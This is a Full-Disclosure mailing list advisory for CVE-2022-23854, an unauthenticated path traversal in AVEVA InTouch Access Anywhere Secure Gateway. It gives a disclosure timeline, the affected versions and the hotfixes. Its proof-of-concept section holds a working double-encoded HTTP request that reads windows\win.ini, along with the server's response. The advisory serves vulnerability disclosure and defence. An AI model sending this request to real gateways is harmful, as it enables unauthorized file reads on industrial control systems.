lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 6 Sep 2022 09:35:04 +0200
From: Jens Regel | CRISEC <jregel@...sec.de>
To: fulldisclosure@...lists.org
Subject: [FD] AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal

Title:
======
AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal

Author:
=======
Jens Regel, CRISEC IT-Security

CVE:
====
CVE-2022-23854

Advisory:
=========
https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal/

Timeline:
=========
25.06.2021 Vulnerability discovered
25.06.2021 Send details to custfirstsupport@...va.com
21.09.2021 Vendor response, fix is available until Q1/2022
25.09.2021 Vendor released Tech Alert TA000022335
06.09.2022 Public disclosure

Vendor:
=======
AVEVA Group plc is a marine and plant engineering IT company 
headquartered in Cambridge, England. AVEVA software is used in many 
sectors, including on- and off-shore oil and gas processing, chemicals, 
pharmaceuticals, nuclear and conventional power generation, nuclear fuel 
reprocessing, recycling and shipbuilding (https://www.aveva.com).

Affected Products:
==================
InTouch Access Anywhere Secure Gateway versions 2020 R2 and older

Details:
========
A security vulnerability exists in InTouch Access Anywhere Secure 
Gateway versions 2020 R2 and older. This is a Relative Path Traversal 
vulnerability which allows an unauthenticated user with network access 
to the Secure Gateway to read files on the system outside of the Secure 
Gateway web server.

Proof of Concept:
=================
GET 
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini 
HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Fix:
====
InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix
InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists